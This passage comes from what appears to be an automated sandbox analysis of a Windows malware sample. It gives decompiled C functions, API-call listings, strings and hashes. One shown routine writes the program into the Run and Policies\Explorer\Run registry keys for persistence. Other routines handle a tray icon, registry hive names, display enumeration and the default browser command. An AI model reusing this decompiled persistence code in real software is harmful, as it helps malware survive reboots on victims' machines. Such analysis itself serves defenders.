                                                                                • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                                                                0x00413c47
                                                                                0x00413c48
                                                                                0x00413d1c
                                                                                0x00413d2c
                                                                                0x00413d31
                                                                                0x00413d37
                                                                                0x00000000
                                                                                0x00413d37
                                                                                0x00413c4e
                                                                                0x00413c53
                                                                                0x00413d03
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d0c
                                                                                0x00413d14
                                                                                0x00413d14
                                                                                0x00413c5e
                                                                                0x00413c7a
                                                                                0x00413c7f
                                                                                0x00413cd1
                                                                                0x00413ceb
                                                                                0x00413cf7
                                                                                0x00413cd3
                                                                                0x00413cdb
                                                                                0x00413cdb
                                                                                0x00000000
                                                                                0x00413cd1
                                                                                0x00413c84
                                                                                0x00413c97
                                                                                0x00413ca0
                                                                                0x00413cbb
                                                                                0x00000000
                                                                                0x00413cbb
                                                                                0x00413c86
                                                                                0x00413c89
                                                                                0x00413c8c
                                                                                0x00413c69
                                                                                0x00000000
                                                                                0x00413c6c
                                                                                0x00413c60
                                                                                0x00413c63
                                                                                0x00413c66
                                                                                0x00000000

                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                                                                • GetCursorPos.USER32(?), ref: 00413C97
                                                                                • SetForegroundWindow.USER32(?), ref: 00413CA0
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                                                                • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                                                                • ExitProcess.KERNEL32 ref: 00413D14
                                                                                • CreatePopupMenu.USER32 ref: 00413D1C
                                                                                • AppendMenuA.USER32 ref: 00413D31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                • String ID: Close
                                                                                • API String ID: 1657328048-3535843008
                                                                                • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                                                                • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                                                                • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                                                                • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E7F7, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                  • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                                                                  • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                                                                  • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                                                                  • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressHandleModuleProcSleep__aulldiv
                                                                                • String ID: z@
                                                                                • API String ID: 502185306-317290069
                                                                                • Opcode ID: 90e96f214da2dad705093cfe314cb979ca6e7dee5d1c7692eb7bae7d6327e244
                                                                                • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                                                                • Opcode Fuzzy Hash: 90e96f214da2dad705093cfe314cb979ca6e7dee5d1c7692eb7bae7d6327e244
                                                                                • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407D53, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                                                                0x00407d60
                                                                                0x00407d6a
                                                                                0x00407d71
                                                                                0x00407d7a
                                                                                0x00407d84
                                                                                0x00407d8c
                                                                                0x00407d99
                                                                                0x00407d9e
                                                                                0x00407da4
                                                                                0x00407da4
                                                                                0x00407dae
                                                                                0x00407db5
                                                                                0x00407dbe
                                                                                0x00407dc8
                                                                                0x00407dd0
                                                                                0x00407ddd
                                                                                0x00407de2
                                                                                0x00407de8
                                                                                0x00407de8
                                                                                0x00407df2
                                                                                0x00407e02
                                                                                0x00407e0c
                                                                                0x00407e21
                                                                                0x00407e2c
                                                                                0x00000000
                                                                                0x00407e2c
                                                                                0x00407e36

                                                                                APIs
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                  • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                                                                  • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                                                                  • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                  • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                                                                  • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID: $ZA$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                • API String ID: 111787555-1962044633
                                                                                • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                                                                • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                                                                • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                                                                • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                                                                • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                                                                • API String ID: 2054586871-62392802
                                                                                • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                                                                • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                                                                • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                                                                • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004121E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                                                                  • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                                                                  • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                                                                  • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                                                                  • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,000197E8,?,?,0041225E,?), ref: 00412919
                                                                                  • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                                                                  • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                                                                  • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                                                                  • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                                                                  • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                                                                  • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                                                                • String ID: .exe$http\shell\open\command
                                                                                • API String ID: 2647146128-4091164470
                                                                                • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                                                                • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                                                                • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                                                                • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041000F, Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                                                                • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 2807017801-0
                                                                                • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                                                                • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401EA2, Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401EA7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 3851886811-0
                                                                                • Opcode ID: 3033ba471139627a95a1ae9ed049b6a3ee367861473b18084aba16617f85b934
                                                                                • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                                                                • Opcode Fuzzy Hash: 3033ba471139627a95a1ae9ed049b6a3ee367861473b18084aba16617f85b934
                                                                                • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004133FE, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                APIs
